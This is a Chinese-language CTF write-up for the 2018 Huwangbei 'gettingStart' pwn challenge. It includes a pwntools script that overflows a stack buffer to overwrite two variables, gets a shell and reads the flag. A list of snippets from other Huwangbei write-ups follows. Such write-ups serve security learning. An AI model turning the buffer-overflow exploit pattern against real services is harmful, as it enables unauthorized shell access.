護網杯pwn題目gettingStart
拖進IDA 通過main函式的程式碼顯而易見
v7需要等於0x7FFFFFFFFFFFFFF以及v8需要等於0.1
通過buf進行覆蓋即可
0.1在記憶體中的值為4591870180066957722
double a = 0.1;
printf("%lld\n", *(long long*)&a);
//輸出4591870180066957722
編寫指令碼
from pwn import * r = remote('xxxxxxx',port) #此處填寫你的題目ip和埠 r.send(b"a"*0x18+p64(0x7FFFFFFFFFFFFFF)+p64(4591870180066957722)) r.interactive() #進入shell互動後 #輸入ls可以看到目錄下有個flag檔案 #cat flag即得到答案
相關推薦
護網杯pwn題目gettingStart
拖進IDA 通過main函式的程式碼顯而易見 v7需要等於0x7FFFFFFFFFFFFFF以及v8需要等於0.1 通過buf進行覆蓋即可 0.1在記憶體中的值為4591870180066957722 double a = 0.1; printf("%lld\n", *
2018護網杯pwn題目task_gettingStart_ktQeERc的writeup
下載後 本來想先用checksec 看看有啥保護 但是卻發現執行不了(這裡不太明白) 看到做出的人那麼多 也就沒有顧慮了 載入IDA 看到關鍵字串 且有/bin/sh
2018護網杯MISC題目遲來的簽到題easy xor???的writeup
這道題我異或?半天。。。 最後隊友小煤球想出來直接異或給的串中所有字元 得到flag from base64 import * b=b64decode("AAoHAR1WX1VQVlNVU1VRUl5XXyMjI1FWJ1IjUCQnXlZWXyckXhs=") data=
護網杯部分題目題解
前言 護網杯的這次比賽還是很有收穫的,至少在web方面我認為是這樣的,還是得繼續努力吧。。。 正文 MISC 遲來的簽到 AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs= 題目說要異或,那就直接爆破異或就好 寫個
護網杯 SIX(PWN)
首先檢視程式保護。 程式的主要邏輯如下。 先看看分配記憶體函式。兩塊記憶體的地址相近。且第一塊的許可權是rwx。 判斷輸入shellcode的函式。要求輸入不超過6個的偶數字節,且各不相同。 主函式最後會執行分配的第一塊記憶體中的程式碼,複製到其中的src反彙編的結果為。
2018護網杯的pwn簽到題(詳細過程)
題目: 連結:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA 提取碼:z5a7 首先找保護機制 難受 保護全開!! 執行一下,發現只有一個輸入點。 ida分析一波 發現只要滿足 v7=0x7FFFFFFFFFFFFFFFLL 還有v8=0.1 但是在
huwang超詳細的wp(護網杯)
護網杯pwn題huwang超詳細wp 比賽結束快一個星期了,復現了一下這道題,借鑑了一下網上的wp發現大佬們寫的都很簡略,所以這裡寫一個詳細的wp供小白們學習。 首發於安恆網路空間安全講武微信公眾號 簡單記錄一些小的知識點 來自於csapp: int open(
2018護網杯第一場 web easy tornado LTshop超詳細解答
easy tornado 這個tornado是一個python的模板,在web使用的時候給出了四個檔案,可以訪問,從提示中和url中可以看出,訪問需要檔名+檔案簽名(長度為32位,計算方式為md5(cookie_secret + md5(filename))); flag檔名題目已給
2018護網杯——easy_dump
題目: 連結: https://pan.baidu.com/s/1IdhDQAv02nAz0H211BoVgA 提取碼: axgp 做題時看到下載下來的600m,懵逼中,看到是img映象檔案當然想到的是利用diskgenuis恢復檔案找特別檔案再進行解密。 一直做不出,是我想的太簡單
2018護網杯_Crypto_fez
題目給了兩個檔案: fez.py: import os def xor(a,b): assert len(a)==len(b) c="" for i in range(len(a)): c+=chr(ord(a[i])^ord
護網杯一道crypto
1 import os 2 def xor(a,b): 3 assert len(a)==len(b) 4 c="" 5 for i in range(len(a)): 6 c+=chr(ord(a[i])^ord(b[i])) 7 return
護網杯一道密碼學的感想
護網杯比賽,一道不算難的密碼學卻思路繞了好久才和出題人相符合,這裡記錄一下做題的過程及感想 題目的原始碼如下: import os def xor(a,b): assert len(a)==len(b) c="" for i in range(len(a)
護網杯REFINAL超詳細WP
前言 由於時間原因沒有在比賽結束前提交flag,所以乾脆寫一個詳細的解答過程(自認為),適合小白閱讀,Pizza大佬請繞過。
2018護網杯MISC簽到題Easy Xor
記錄一下做這種題的方法 題目直接給了一串base64加密的字串,讓我們xor AAoHAR0jJ1AlVVEkU1BUVCAlIlFTUVUiUFRTVFVeU1FXUCVUJxs= 在網上看大佬們的writeup說的是因為不知道和誰異或,所以直接寫指令碼爆破 imp
2018 護網杯
再一次觀看了一波神仙打架。 Misc 遲來的簽到題 題目提示 easy xor,開啟附件是一串 base64: AAoHAR1QUiBTJVBQI1RVIl5WJVInUlNWIFZUX1ZRJ1dWU1dfURs= 解碼是亂碼。 猜想思路和 CSAW 密
護網杯wp
Web Easy_tornado 三個檔案都看一遍,在hint.txt裡面看到md5(cookie_secret + md5(filename)) 結合tornado想到可能是要獲取cookie_secret 其實就是一般的模板注入(這題可以SSTI,沒接觸過的
網鼎杯pwn之GUESS
做了網鼎杯才發現自己有多菜。。。 拿到題目先ida一波 基本分析 看到了發現了是一個本地載入flag.txt所以有可能可以用stack samsh:詳細可以看ctf wiki上的花式棧溢位技巧然後拖入gdb 進行一波checksec &n
2018網(PWN)鼎杯第一場解題記錄(Writeup)
MISC clip 使用十六進位制檢視軟體開啟,查詢的過程中發現有idat頭: 還有一處在下方,表示還有另一張圖片 但是這裡缺少頭部需要手動補充上去再另存檔案: 一共提取出兩張圖片,但是圖片明顯被處理過了
強網杯ctf pwn&re writeup (部分)
打了2天的強網杯,雖然一度衝進了前10。可惜最後的時候還是掉出了20名。最後只能無奈打出GG。其中的原因有很多,也不想多說了。 逆向溢位題3連發。我就只會那麼多了Orz 先來一道re200 kergen 傳送24位的字串,主要是400B56處的檢
網易筆試題目-2017-9-25
試題 pre ssi 不同 ring import bit imp ges 1 package demi; 2 3 import java.util.Arrays; 4 import java.util.Scanner; 5 6 public clas